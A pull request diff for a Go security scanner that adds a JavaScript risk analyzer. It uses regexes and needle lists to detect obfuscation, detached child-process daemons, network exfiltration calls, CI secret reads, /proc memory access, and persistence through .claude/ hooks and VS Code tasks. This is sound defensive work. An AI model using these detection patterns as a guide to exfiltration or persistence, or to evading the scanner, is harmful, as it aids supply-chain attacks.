### PR TITLE
feat(jsrisk): JavaScript payload risk analyzer

### DIFF
--- a/aguara.go
+++ b/aguara.go
@@ -15,6 +15,7 @@ import (
 
 	"github.com/garagon/aguara/discover"
 	"github.com/garagon/aguara/internal/engine/ci"
+	"github.com/garagon/aguara/internal/engine/jsrisk"
 	"github.com/garagon/aguara/internal/engine/nlp"
 	"github.com/garagon/aguara/internal/engine/pattern"
 	"github.com/garagon/aguara/internal/engine/pkgmeta"
@@ -418,6 +419,10 @@ func (sc *Scanner) buildInternalScanner(toolName string) (*scanner.Scanner, erro
 	s.RegisterAnalyzer(ci.New())
 	// pkgmeta inspects package.json for npm lifecycle / git-source chains.
 	s.RegisterAnalyzer(pkgmeta.New())
+	// jsrisk scans JavaScript for obfuscation, daemonization, CI secret
+	// exfil sinks, runner-process memory access, and Claude / VS Code
+	// persistence references.
+	s.RegisterAnalyzer(jsrisk.New())
 	// NLP and ToxicFlow are stateless, cheap to instantiate
 	s.RegisterAnalyzer(nlp.NewInjectionAnalyzer())
 	s.RegisterAnalyzer(toxicflow.New())
@@ -558,6 +563,7 @@ func buildScanner(cfg *scanConfig) (*scanner.Scanner, []*rules.CompiledRule, err
 	s.RegisterAnalyzer(pattern.NewMatcher(cr.compiled))
 	s.RegisterAnalyzer(ci.New())
 	s.RegisterAnalyzer(pkgmeta.New())
+	s.RegisterAnalyzer(jsrisk.New())
 	s.RegisterAnalyzer(nlp.NewInjectionAnalyzer())
 	s.RegisterAnalyzer(toxicflow.New())
 	s.SetCrossFileAccumulator(toxicflow.NewCrossFileAnalyzer())

--- a/cmd/aguara/commands/scan.go
+++ b/cmd/aguara/commands/scan.go
@@ -14,6 +14,7 @@ import (
 	"github.com/garagon/aguara/internal/config"
 	"github.com/garagon/aguara/internal/update"
 	"github.com/garagon/aguara/internal/engine/ci"
+	"github.com/garagon/aguara/internal/engine/jsrisk"
 	"github.com/garagon/aguara/internal/engine/nlp"
 	"github.com/garagon/aguara/internal/engine/pattern"
 	"github.com/garagon/aguara/internal/engine/pkgmeta"
@@ -393,6 +394,7 @@ func buildScanner(compiled []*rules.CompiledRule, cfg config.Config, minSev scan
 	s.RegisterAnalyzer(pattern.NewMatcher(compiled))
 	s.RegisterAnalyzer(ci.New())
 	s.RegisterAnalyzer(pkgmeta.New())
+	s.RegisterAnalyzer(jsrisk.New())
 	s.RegisterAnalyzer(nlp.NewInjectionAnalyzer())
 	s.RegisterAnalyzer(toxicflow.New())
 	s.SetCrossFileAccumulator(toxicflow.NewCrossFileAnalyzer())

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -239,15 +239,11 @@ func computeMetrics(content []byte) *metrics {
 			m.HasSessionSink = true
 		}
 	}
-	// HasChildProcess requires both a child_process module reference AND
-	// a real invocation. Without the module gate `worker.spawn(...)` on
-	// an unrelated object would falsely match; without the invocation
-	// gate a bare import would suffice. The bare-form regex covers
-	// destructured imports (`const { spawn } = require('child_process')`)
-	// and the method-form regex covers `cp.spawn(...)`.
-	m.HasChildProcess = bytes.Contains(content, []byte("child_process")) &&
-		(childProcessMethodInvokeRe.Match(content) ||
-			childProcessBareInvokeRe.Match(content))
+	// HasChildProcess is true when the file contains either a
+	// receiver-bound child_process method call (require chain or known
+	// alias) or a bare invocation whose name was destructured from
+	// child_process. Used by JS_OBF_001 severity escalation only.
+	m.HasChildProcess = hasChildProcessInvocation(content)
 	m.HasProcessEnv = bytes.Contains(lower, []byte("process.env"))
 
 	// CI / cloud secret reads come in three forms: direct member access
@@ -365,54 +361,119 @@ func lineOf(content []byte, idx int) int {
 	return bytes.Count(content[:idx], []byte{'\n'}) + 1
 }
 
-// findDaemonChain walks each child_process invocation in content. For
-// each, it inspects the next daemonProximityWindow bytes (the trailing
-// options object plus a margin) and returns the invocation's line if
-// the options include detached: true AND either stdio: 'ignore' or a
-// `.unref()` call on the spawned child within the same window. The
-// per-invocation gate means an unrelated object literal carrying
-// daemon-shape options elsewhere in the file no longer satisfies the
-// rule.
+// cpCallSite records a real child_process invocation: Start is the
+// beginning of the receiver/name token, ArgsStart is the byte after
+// the opening `(`. Daemon detection extracts the call's actual args
+// (paren-balanced) starting at ArgsStart so options belonging to a
+// different nearby call do not satisfy the chain.
+type cpCallSite struct {
+	Start     int
+	ArgsStart int
+}
+
+// collectChildProcessCalls returns sites of real child_process
+// invocations: receiver-bound method calls (require chain or known
+// module alias) plus bare calls whose name was destructured from
+// child_process. Unrelated `.spawn(...)` calls and bare calls whose
+// name was never imported from the module are excluded.
+func collectChildProcessCalls(content []byte) []cpCallSite {
+	var sites []cpCallSite
+	for _, loc := range childProcessReceiverRe.FindAllIndex(content, -1) {
+		sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
+	}
+	// Collect destructured names: plain names and alias forms
+	// (`spawn: launch`); the source name (before `:`) is the one called.
+	destructuredNames := map[string]bool{}
+	for _, m := range childProcessDestructureRe.FindAllSubmatchIndex(content, -1) {
+		body := string(content[m[2]:m[3]])
+		for _, raw := range strings.Split(body, ",") {
+			entry := strings.TrimSpace(raw)
+			if i := strings.Index(entry, ":"); i >= 0 {
+				entry = strings.TrimSpace(entry[:i])
+			}
+			if entry != "" {
+				destructuredNames[entry] = true
+			}
+		}
+	}
+	if len(destructuredNames) > 0 {
+		for _, loc := range childProcessBareInvokeRe.FindAllSubmatchIndex(content, -1) {
+			if destructuredNames[string(content[loc[2]:loc[3]])] {
+				sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
+			}
+		}
+	}
+	// Sort by Start so the earliest qualifying call is the anchor.
+	for i := 1; i < len(sites); i++ {
+		for j := i; j > 0 && sites[j-1].Start > sites[j].Start; j-- {
+			sites[j-1], sites[j] = sites[j], sites[j-1]
+		}
+	}
+	return sites
+}
+
+// hasChildProcessInvocation reports whether the file contains any
+// real child_process invocation. Used by JS_OBF_001 severity escalation.
+func hasChildProcessInvocation(content []byte) bool {
+	return len(collectChildProcessCalls(content)) > 0
+}
+
+// extractCallArgs returns the bytes between the opening `(` at
+// argsStart (inclusive) and its matching `)`, ignoring quoted string
+// literals and template literals. Nested parens balance correctly.
+// When the call is unterminated (truncated input), the remainder of
+// content is returned, which is conservative for proximity checks.
+func extractCallArgs(content []byte, argsStart int) []byte {
+	depth := 1
+	inStr := byte(0)
+	escaped := false
+	for i := argsStart; i < len(content); i++ {
+		c := content[i]
+		if escaped {
+			escaped = false
+			continue
+		}
+		if inStr != 0 {
+			if c == '\\' {
+				escaped = true
+				continue
+			}
+			if c == inStr {
+				inStr = 0
+			}
+			continue
+		}
+		switch c {
+		case '\'', '"', '`':
+			inStr = c
+		case '(':
+			depth++
+		case ')':
+			depth--
+			if depth == 0 {
+				return content[argsStart:i]
+			}
+		}
+	}
+	return content[argsStart:]
+}
+
+// findDaemonChain returns the line of the first child_process call
+// whose own args (paren-balanced, string-aware) contain BOTH
+// `detached: true` AND `stdio: 'ignore'`. The args-extracted check
+// ties the options to the call that owns them, so daemon-shape
+// options belonging to an unrelated nearby spawn (or a different
+// trailing object literal) do not satisfy the chain.
 func findDaemonChain(content []byte) (int, bool) {
-	// Gate: the file must reference child_process somewhere. Without
-	// this, `worker.spawn(...)` on an unrelated object would trip the
-	// method-invocation regex below. The module gate is the same one
-	// HasChildProcess uses, kept inline so the daemon walk is
-	// self-contained.
-	if !bytes.Contains(content, []byte("child_process")) {
-		return 0, false
-	}
-	// Collect the indices of every method-form and bare-form invocation.
-	var idxs []int
-	for _, loc := range childProcessMethodInvokeRe.FindAllIndex(content, -1) {
-		idxs = append(idxs, loc[0])
-	}
-	for _, loc := range childProcessBareInvokeRe.FindAllIndex(content, -1) {
-		idxs = append(idxs, loc[0])
-	}
-	if len(idxs) == 0 {
-		return 0, false
-	}
-	// Stable sort by index so we anchor at the earliest qualifying call.
-	// A simple insertion sort suffices (low cardinality in practice).
-	for i := 1; i < len(idxs); i++ {
-		for j := i; j > 0 && idxs[j-1] > idxs[j]; j-- {
-			idxs[j-1], idxs[j] = idxs[j], idxs[j-1]
-		}
-	}
-	for _, start := range idxs {
-		end := start + daemonProximityWindow
-		if end > len(content) {
-			end = len(content)
-		}
-		win := content[start:end]
-		if !detachedTrueRe.Match(win) {
+	for _, site := range collectChildProcessCalls(content) {
+		args := extractCallArgs(content, site.ArgsStart)
+		if !detachedTrueRe.Match(args) {
 			continue
 		}
-		if !stdioIgnoredRe.Match(win) && !bytes.Contains(win, []byte(".unref()")) {
+		if !stdioIgnoredRe.Match(args) {
 			continue
 		}
-		return lineOf(content, start), true
+		return lineOf(content, site.Start), true
 	}
 	return 0, false
 }
@@ -431,18 +492,35 @@ const procMemPairWindow = 200
 // because they lack the intervening pid segment.
 var procMemLiteralRe = regexp.MustCompile(`/proc/(?:[0-9]+|self|thread-self)/(mem|maps|cmdline)\b`)
 
-// childProcessMethodInvokeRe matches a child_process method call:
-// `cp.spawn(...)`, `child_process.fork(...)`, etc. The leading `.`
-// ensures the name is a method, not an unrelated function.
-var childProcessMethodInvokeRe = regexp.MustCompile(`\.(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+// childProcessReceiverRe matches a child_process method call whose
+// receiver is either an inline require chain or a conventional alias
+// for the imported module. Restricting to these receivers prevents
+// `worker.spawn(...)` on an unrelated object from satisfying the
+// daemon chain just because `child_process` appears elsewhere in the
+// file. The conventional aliases (cp, childProcess, child_process,
+// ChildProcess) cover the bindings real-world code uses; obscure
+// renames are intentionally out of reach without AST parsing.
+var childProcessReceiverRe = regexp.MustCompile(
+	`(?:require\s*\(\s*['"](?:node:)?child_process['"]\s*\)|\b(?:cp|childProcess|child_process|ChildProcess|_cp)\b)` +
+		`\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
+)
 
 // childProcessBareInvokeRe matches a bare invocation: `spawn(...)`,
 // `fork(...)`, `exec(...)`, etc., used after `const { spawn } =
 // require('child_process')`. Word boundary on the left avoids
-// matching `myspawn(`. The bare form is only treated as a child
-// process invocation when the file also references child_process
-// (see hasChildProcess gating below).
-var childProcessBareInvokeRe = regexp.MustCompile(`\b(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+// matching `myspawn(`. Bare-form invocations are only credited when
+// the file also contains a destructured import that names the same
+// method from child_process (see findDaemonChain).
+var childProcessBareInvokeRe = regexp.MustCompile(`\b(spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+
+// childProcessDestructureRe matches `const { spawn, fork } =
+// require('child_process')` and its var/let variants. Submatch 1 is
+// the name list inside the braces; the daemon chain compares each
+// trimmed entry (alias-stripped on `:`) against the bare-form name
+// before crediting the corresponding invocation.
+var childProcessDestructureRe = regexp.MustCompile(
+	`(?:const|let|var)\s*\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?child_process['"]\s*\)`,
+)
 
 // envReadRe captures direct env-variable reads:
 // `process.env.<NAME>`, `process.env['<NAME>']`, or
@@ -460,11 +538,6 @@ var envReadRe = regexp.MustCompile(`process\.env\s*(?:\.|\[\s*['"])([A-Z][A-Z0-9
 // take the substring before `:` (if present) as the source name.
 var envDestructureRe = regexp.MustCompile(`\{\s*([^}]+?)\s*\}\s*=\s*process\.env\b`)
 
-// daemonProximityWindow bounds how far the daemonization options can
-// appear after a child_process invocation before they stop counting
-// as part of that call's options. 500 bytes covers a multi-line
-// options object passed as the trailing argument.
-const daemonProximityWindow = 500
 
 // procMemDynamicSubRe matches the quote-wrapped subpath token used by
 // dynamic forms: `'/mem'`, `"/maps"`, `` `/cmdline` ``, and the

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -715,20 +715,26 @@ func findProcMemPair(content []byte) int {
 // socket call to an external endpoint via a fixed name (fetch, axios,
 // got, http/https/net used as the literal module identifier, or the
 // inline require chain). Aliased forms (`const h = require('https'); h.request(...)`)
-// are handled separately by collectNetworkAliasSinks so the analyzer
+// are handled separately by findNetworkAliasSink so the analyzer
 // follows the same alias-discovery approach used for child_process.
+//
+// `fetch` is guarded with jsIdentBoundary (not `\b`) so that a local
+// method call like `cache.fetch(...)` does not satisfy the sink: the
+// `.` before fetch is in the exclusion set. The other alternations
+// already contain a literal `.` and so cannot collide with local
+// methods of the same name.
 var networkSinkRe = regexp.MustCompile(
-	`(?i)\b(?:` +
-		`fetch|` +
-		`axios\.(?:post|put|request|get)|` +
-		`got\.(?:post|put|get)|` +
-		`http\.request|https\.request|` +
-		`net\.connect|net\.createconnection|` +
-		`xmlhttprequest` +
-		`)\s*\(` +
-		// require chain variants: require('https').request(...) and
-		// node: scheme. Single and double-quoted module names.
-		`|require\s*\(\s*['"](?:node:)?https?['"]\s*\)\s*\.\s*request\s*\(`,
+	`(?i)(?:` +
+		jsIdentBoundary + `fetch\s*\(` +
+		`|\baxios\.(?:post|put|request|get)\s*\(` +
+		`|\bgot\.(?:post|put|get)\s*\(` +
+		`|\bhttp\.request\s*\(|\bhttps\.(?:request|get)\s*\(` +
+		`|\bnet\.connect\s*\(|\bnet\.createconnection\s*\(` +
+		`|\bxmlhttprequest\s*\(` +
+		// require chain variants: require('https').{request,get}(...)
+		// and node: scheme. Single- and double-quoted module names.
+		`|require\s*\(\s*['"](?:node:)?https?['"]\s*\)\s*\.\s*(?:request|get)\s*\(` +
+		`)`,
 )
 
 // httpModuleAliasAssignRe captures local names bound to the http,

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -381,23 +381,35 @@ func collectChildProcessCalls(content []byte) []cpCallSite {
 	for _, loc := range childProcessReceiverRe.FindAllIndex(content, -1) {
 		sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
 	}
-	// Collect destructured names: plain names and alias forms
-	// (`spawn: launch`); the source name (before `:`) is the one called.
+	// Collect destructured local names. For each entry the source
+	// (left of `:` in CJS, left of ` as ` in ESM) must be a real
+	// child_process method; the local binding (right side, or the
+	// entry itself when not aliased) is what shows up in a bare call.
 	destructuredNames := map[string]bool{}
-	for _, m := range childProcessDestructureRe.FindAllSubmatchIndex(content, -1) {
-		body := string(content[m[2]:m[3]])
+	addDestructure := func(body string, aliasSep string) {
 		for _, raw := range strings.Split(body, ",") {
 			entry := strings.TrimSpace(raw)
-			if i := strings.Index(entry, ":"); i >= 0 {
-				entry = strings.TrimSpace(entry[:i])
+			if entry == "" {
+				continue
 			}
-			if entry != "" {
-				destructuredNames[entry] = true
+			source, local := entry, entry
+			if i := strings.Index(entry, aliasSep); i >= 0 {
+				source = strings.TrimSpace(entry[:i])
+				local = strings.TrimSpace(entry[i+len(aliasSep):])
+			}
+			if cpMethodNames[source] && local != "" {
+				destructuredNames[local] = true
 			}
 		}
 	}
+	for _, m := range childProcessDestructureRe.FindAllSubmatchIndex(content, -1) {
+		addDestructure(string(content[m[2]:m[3]]), ":")
+	}
+	for _, m := range childProcessESMDestructureRe.FindAllSubmatchIndex(content, -1) {
+		addDestructure(string(content[m[2]:m[3]]), " as ")
+	}
 	if len(destructuredNames) > 0 {
-		for _, loc := range childProcessBareInvokeRe.FindAllSubmatchIndex(content, -1) {
+		for _, loc := range anyBareInvokeRe.FindAllSubmatchIndex(content, -1) {
 			if destructuredNames[string(content[loc[2]:loc[3]])] {
 				sites = append(sites, cpCallSite{Start: loc[0], ArgsStart: loc[1]})
 			}
@@ -505,22 +517,39 @@ var childProcessReceiverRe = regexp.MustCompile(
 		`\s*\.\s*(?:spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`,
 )
 
-// childProcessBareInvokeRe matches a bare invocation: `spawn(...)`,
-// `fork(...)`, `exec(...)`, etc., used after `const { spawn } =
-// require('child_process')`. Word boundary on the left avoids
-// matching `myspawn(`. Bare-form invocations are only credited when
-// the file also contains a destructured import that names the same
-// method from child_process (see findDaemonChain).
-var childProcessBareInvokeRe = regexp.MustCompile(`\b(spawn|spawnSync|fork|exec|execSync|execFile|execFileSync)\s*\(`)
+// anyBareInvokeRe captures the name and call site of any bare
+// identifier invocation in the file. Used together with the
+// destructured-name set: only invocations whose name was destructured
+// from child_process (CJS or ESM) and originally bound to a real cp
+// method are credited as a child_process call.
+var anyBareInvokeRe = regexp.MustCompile(`\b([A-Za-z_$][\w$]*)\s*\(`)
 
 // childProcessDestructureRe matches `const { spawn, fork } =
 // require('child_process')` and its var/let variants. Submatch 1 is
-// the name list inside the braces; the daemon chain compares each
-// trimmed entry (alias-stripped on `:`) against the bare-form name
-// before crediting the corresponding invocation.
+// the brace body; callers parse each entry for the local binding
+// (after `:` if aliased, the entry itself otherwise).
 var childProcessDestructureRe = regexp.MustCompile(
 	`(?:const|let|var)\s*\{\s*([^}]+)\s*\}\s*=\s*require\s*\(\s*['"](?:node:)?child_process['"]\s*\)`,
 )
+
+// childProcessESMDestructureRe matches the ESM equivalent:
+// `import { spawn } from 'child_process'` /
+// `import { spawn as launch } from 'node:child_process'`. The .mjs /
+// .cjs scan targets need this form for parity with CommonJS code.
+var childProcessESMDestructureRe = regexp.MustCompile(
+	`import\s*\{\s*([^}]+)\s*\}\s*from\s*['"](?:node:)?child_process['"]`,
+)
+
+// cpMethodNames is the set of child_process methods whose call is
+// considered an invocation for daemon detection. The bare-form
+// callable (after destructure aliasing) must originate from one of
+// these names.
+var cpMethodNames = map[string]bool{
+	"spawn": true, "spawnSync": true,
+	"fork":    true,
+	"exec":    true, "execSync": true,
+	"execFile": true, "execFileSync": true,
+}
 
 // envReadRe captures direct env-variable reads:
 // `process.env.<NAME>`, `process.env['<NAME>']`, or

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -219,10 +219,19 @@ func computeMetrics(content []byte) *metrics {
 	// Network / publish / GitHub / session sinks. The network regex is
 	// whitespace-tolerant (so `fetch (...)` matches) and case-insensitive.
 	// Publish / GitHub / session sinks are unambiguous literal strings.
+	// Aliased http/https/net imports are discovered separately so a
+	// payload like `const h = require('https'); h.request(...)` still
+	// counts as a network sink.
 	lower := bytes.ToLower(content)
 	if loc := networkSinkRe.FindIndex(content); loc != nil {
 		m.HasNetworkSink = true
 		m.LineNetworkSink = lineOf(content, loc[0])
+	}
+	if !m.HasNetworkSink {
+		if line := findNetworkAliasSink(content); line > 0 {
+			m.HasNetworkSink = true
+			m.LineNetworkSink = line
+		}
 	}
 	for _, n := range publishSinkNeedles {
 		if bytes.Contains(lower, []byte(n)) {
@@ -320,17 +329,13 @@ func computeMetrics(content []byte) *metrics {
 		bytes.Contains(content, []byte("ACTIONS_ID_TOKEN_REQUEST_URL"))
 	m.HasRunnerWorker = bytes.Contains(content, []byte("Runner.Worker"))
 
-	// Agent persistence references. Path-only needles fire on their
-	// own; the runOn:folderOpen token only counts as persistence when
-	// the file also references .vscode/tasks.json (manually-runnable
-	// tasks files alone are not persistence).
+	// Agent persistence references. The standalone needles are all
+	// inside .claude/ and each fire on their own (Claude Code's
+	// auto-execution surface). VS Code persistence is gated on the
+	// pair below: tasks.json + runOn:folderOpen.
 	for _, n := range agentPersistenceNeedles {
 		if i := bytes.Index(content, []byte(n)); i >= 0 {
-			if strings.HasPrefix(n, ".claude/") {
-				m.HasClaudePersistence = true
-			} else {
-				m.HasVSCodePersistence = true
-			}
+			m.HasClaudePersistence = true
 			if m.LineAgentPath == 0 {
 				m.LineAgentPath = lineOf(content, i)
 				m.AgentPathMatched = n
@@ -453,6 +458,37 @@ func collectChildProcessCalls(content []byte) []cpCallSite {
 // real child_process invocation. Used by JS_OBF_001 severity escalation.
 func hasChildProcessInvocation(content []byte) bool {
 	return len(collectChildProcessCalls(content)) > 0
+}
+
+// findNetworkAliasSink walks imports of http/https/net and reports
+// the line of the first <alias>.<method>(...) call against any of
+// the imported aliases. The alias set is built from real require/
+// import statements so an unrelated object named `h` does not trip
+// the rule. Returns 0 when no alias has been imported or no aliased
+// call appears.
+func findNetworkAliasSink(content []byte) int {
+	aliases := map[string]bool{}
+	for _, m := range httpModuleAliasAssignRe.FindAllSubmatchIndex(content, -1) {
+		aliases[string(content[m[2]:m[3]])] = true
+	}
+	for _, m := range httpModuleAliasESMRe.FindAllSubmatchIndex(content, -1) {
+		aliases[string(content[m[2]:m[3]])] = true
+	}
+	if len(aliases) == 0 {
+		return 0
+	}
+	var nameParts []string
+	for n := range aliases {
+		nameParts = append(nameParts, regexp.QuoteMeta(n))
+	}
+	methodPart := strings.Join(httpAliasMethods, "|")
+	re := regexp.MustCompile(
+		`\b(?:` + strings.Join(nameParts, "|") + `)\s*\.\s*(?:` + methodPart + `)\s*\(`,
+	)
+	if loc := re.FindIndex(content); loc != nil {
+		return lineOf(content, loc[0])
+	}
+	return 0
 }
 
 // extractCallArgs returns the bytes between the opening `(` at
@@ -654,12 +690,11 @@ func findProcMemPair(content []byte) int {
 // of that name (in-memory caches, database clients, queue libraries),
 // turning the credential-harvest chain into a wide CI block.
 // networkSinkRe matches JavaScript expressions that perform an HTTP /
-// socket call to an external endpoint. JavaScript permits whitespace
-// between the callee and `(`, so the regex tolerates it; this catches
-// `fetch (...)` exfil payloads that a literal `fetch(` substring
-// would miss. Each alternation names a specific API rather than a
-// bare method like `.post(` so unrelated objects with same-named
-// methods do not falsely trigger.
+// socket call to an external endpoint via a fixed name (fetch, axios,
+// got, http/https/net used as the literal module identifier, or the
+// inline require chain). Aliased forms (`const h = require('https'); h.request(...)`)
+// are handled separately by collectNetworkAliasSinks so the analyzer
+// follows the same alias-discovery approach used for child_process.
 var networkSinkRe = regexp.MustCompile(
 	`(?i)\b(?:` +
 		`fetch|` +
@@ -673,6 +708,26 @@ var networkSinkRe = regexp.MustCompile(
 		// node: scheme. Single and double-quoted module names.
 		`|require\s*\(\s*['"](?:node:)?https?['"]\s*\)\s*\.\s*request\s*\(`,
 )
+
+// httpModuleAliasAssignRe captures local names bound to the http,
+// https, or net modules via require, e.g.
+// `const h = require('https')`, `let net = require('node:net')`.
+// Submatch 1 is the local name.
+var httpModuleAliasAssignRe = regexp.MustCompile(
+	`(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*require\s*\(\s*['"](?:node:)?(?:http|https|net)['"]\s*\)`,
+)
+
+// httpModuleAliasESMRe captures ESM default and namespace imports of
+// http / https / net.
+var httpModuleAliasESMRe = regexp.MustCompile(
+	`import\s+(?:\*\s+as\s+)?([A-Za-z_$][\w$]*)\s+from\s*['"](?:node:)?(?:http|https|net)['"]`,
+)
+
+// httpAliasMethods is the set of methods that count as a network sink
+// when invoked on an aliased http / https / net module: an attacker
+// calling `h.request(...)` against an imported https alias is the
+// classic compact-exfil shape.
+var httpAliasMethods = []string{"request", "get", "post", "put", "connect", "createConnection"}
 
 var publishSinkNeedles = []string{
 	"registry.npmjs.org",
@@ -716,16 +771,20 @@ var ciSecretLiteralNeedles = []string{
 	"169.254.170.2",
 }
 
-// agentPersistenceNeedles are paths whose presence alone is sufficient
-// evidence of editor-automation persistence. Each names a file that
-// either holds auto-running config (.claude/settings.json hooks) or is
-// itself auto-executed (.vscode/setup.mjs) on workspace open.
+// agentPersistenceNeedles are paths whose presence alone is
+// sufficient evidence of editor-automation persistence. Each lives
+// inside .claude/ and is a known surface that Claude Code reads or
+// executes on workspace open (settings.json hooks, the router
+// runtime, the setup hook, the hooks directory). VS Code paths are
+// intentionally excluded from the standalone list: VS Code does
+// not auto-execute arbitrary files under .vscode/, so VS Code
+// persistence requires a tasks.json + runOn:folderOpen pair (see
+// detection below).
 var agentPersistenceNeedles = []string{
 	".claude/settings.json",
 	".claude/router_runtime.js",
 	".claude/setup.mjs",
 	".claude/hooks/",
-	".vscode/setup.mjs",
 }
 
 // runOnFolderOpenRe captures the VS Code task trigger that turns a

--- a/internal/engine/jsrisk/jsrisk.go
+++ b/internal/engine/jsrisk/jsrisk.go
@@ -146,10 +146,8 @@ type metrics struct {
 	LineCISecret    int
 	CISecretMatched string
 
-	HasSpawnDetached bool
-	HasStdioIgnored  bool
-	HasUnref         bool
-	LineDaemon       int
+	HasDaemonChain bool
+	LineDaemon     int
 
 	HasProcMemAccess bool
 	HasOIDCTokenEnv  bool
@@ -218,17 +216,13 @@ func computeMetrics(content []byte) *metrics {
 		m.LineObfSpecific = lineOf(content, disp[0][0])
 	}
 
-	// Network / publish / GitHub / session sinks. Each list is a small
-	// set of unambiguous strings that should not appear in unrelated
-	// dependency or library names.
+	// Network / publish / GitHub / session sinks. The network regex is
+	// whitespace-tolerant (so `fetch (...)` matches) and case-insensitive.
+	// Publish / GitHub / session sinks are unambiguous literal strings.
 	lower := bytes.ToLower(content)
-	for _, n := range networkSinkNeedles {
-		if i := bytes.Index(lower, []byte(n)); i >= 0 {
-			m.HasNetworkSink = true
-			if m.LineNetworkSink == 0 {
-				m.LineNetworkSink = lineOf(content, i)
-			}
-		}
+	if loc := networkSinkRe.FindIndex(content); loc != nil {
+		m.HasNetworkSink = true
+		m.LineNetworkSink = lineOf(content, loc[0])
 	}
 	for _, n := range publishSinkNeedles {
 		if bytes.Contains(lower, []byte(n)) {
@@ -283,8 +277,13 @@ func computeMetrics(content []byte) *metrics {
 			}
 			nameList := string(content[match[2]:match[3]])
 			for _, raw := range strings.Split(nameList, ",") {
-				name := strings.TrimSpace(raw)
-				checkSecretName(name, match[0])
+				entry := strings.TrimSpace(raw)
+				// Aliased entries take the form `NAME: alias`; the
+				// source name is everything before the colon.
+				if idx := strings.Index(entry, ":"); idx >= 0 {
+					entry = strings.TrimSpace(entry[:idx])
+				}
+				checkSecretName(entry, match[0])
 				if m.HasCISecretRead {
 					break
 				}
@@ -304,17 +303,14 @@ func computeMetrics(content []byte) *metrics {
 		}
 	}
 
-	// Daemonization signals. Quote-tolerant regex catches the JSON-style
-	// `"detached": true` form that a naive substring match for
-	// `detached:` would skip.
-	if loc := detachedTrueRe.FindIndex(content); loc != nil {
-		m.HasSpawnDetached = true
-		m.LineDaemon = lineOf(content, loc[0])
+	// Daemonization is computed inline so the chain options (detached,
+	// stdio:ignore, .unref()) are tied to a real child_process call,
+	// not satisfied by any object literal elsewhere in the file. See
+	// findDaemonChain for the per-invocation proximity walk.
+	if line, ok := findDaemonChain(content); ok {
+		m.HasDaemonChain = true
+		m.LineDaemon = line
 	}
-	if stdioIgnoredRe.Match(content) {
-		m.HasStdioIgnored = true
-	}
-	m.HasUnref = bytes.Contains(content, []byte(".unref()"))
 
 	// Process memory access requires a /proc/ reference paired with a
 	// memory-like subpath (/mem, /maps, cmdline) in proximity. The
@@ -369,6 +365,58 @@ func lineOf(content []byte, idx int) int {
 	return bytes.Count(content[:idx], []byte{'\n'}) + 1
 }
 
+// findDaemonChain walks each child_process invocation in content. For
+// each, it inspects the next daemonProximityWindow bytes (the trailing
+// options object plus a margin) and returns the invocation's line if
+// the options include detached: true AND either stdio: 'ignore' or a
+// `.unref()` call on the spawned child within the same window. The
+// per-invocation gate means an unrelated object literal carrying
+// daemon-shape options elsewhere in the file no longer satisfies the
+// rule.
+func findDaemonChain(content []byte) (int, bool) {
+	// Gate: the file must reference child_process somewhere. Without
+	// this, `worker.spawn(...)` on an unrelated object would trip the
+	// method-invocation regex below. The module gate is the same one
+	// HasChildProcess uses, kept inline so the daemon walk is
+	// self-contained.
+	if !bytes.Contains(content, []byte("child_process")) {
+		return 0, false
+	}
+	// Collect the indices of every method-form and bare-form invocation.
+	var idxs []int
+	for _, loc := range childProcessMethodInvokeRe.FindAllIndex(content, -1) {
+		idxs = append(idxs, loc[0])
+	}
+	for _, loc := range childProcessBareInvokeRe.FindAllIndex(content, -1) {
+		idxs = append(idxs, loc[0])
+	}
+	if len(idxs) == 0 {
+		return 0, false
+	}
+	// Stable sort by index so we anchor at the earliest qualifying call.
+	// A simple insertion sort suffices (low cardinality in practice).
+	for i := 1; i < len(idxs); i++ {
+		for j := i; j > 0 && idxs[j-1] > idxs[j]; j-- {
+			idxs[j-1], idxs[j] = idxs[j], idxs[j-1]
+		}
+	}
+	for _, start := range idxs {
+		end := start + daemonProximityWindow
+		if end > len(content) {
+			end = len(content)
+		}
+		win := content[start:end]
+		if !detachedTrueRe.Match(win) {
+			continue
+		}
+		if !stdioIgnoredRe.Match(win) && !bytes.Contains(win, []byte(".unref()")) {
+			continue
+		}
+		return lineOf(content, start), true
+	}
+	return 0, false
+}
+
 // procMemPairWindow bounds how far a quote-wrapped memory subpath can
 // be from a /proc/ occurrence before they stop counting as part of the
 // same access. 200 bytes is generous for any plausible source form
@@ -401,11 +449,22 @@ var childProcessBareInvokeRe = regexp.MustCompile(`\b(?:spawn|spawnSync|fork|exe
 // `process.env["<NAME>"]`.
 var envReadRe = regexp.MustCompile(`process\.env\s*(?:\.|\[\s*['"])([A-Z][A-Z0-9_]+)`)
 
-// envDestructureRe captures destructured env reads:
-// `const { GITHUB_TOKEN } = process.env`,
-// `const { FOO, BAR } = process.env`. Submatch 1 is the comma-
-// separated name list; callers split it and check each name.
-var envDestructureRe = regexp.MustCompile(`\{\s*([A-Z][A-Z0-9_]+(?:\s*,\s*[A-Z][A-Z0-9_]+)*)\s*\}\s*=\s*process\.env\b`)
+// envDestructureRe captures destructured env reads with or without
+// aliases:
+//
+//	const { GITHUB_TOKEN } = process.env
+//	const { FOO, GITHUB_TOKEN: t } = process.env
+//	const { GITHUB_TOKEN: t, NPM_TOKEN: n } = process.env
+//
+// Submatch 1 is the full brace content; callers split on `,` and
+// take the substring before `:` (if present) as the source name.
+var envDestructureRe = regexp.MustCompile(`\{\s*([^}]+?)\s*\}\s*=\s*process\.env\b`)
+
+// daemonProximityWindow bounds how far the daemonization options can
+// appear after a child_process invocation before they stop counting
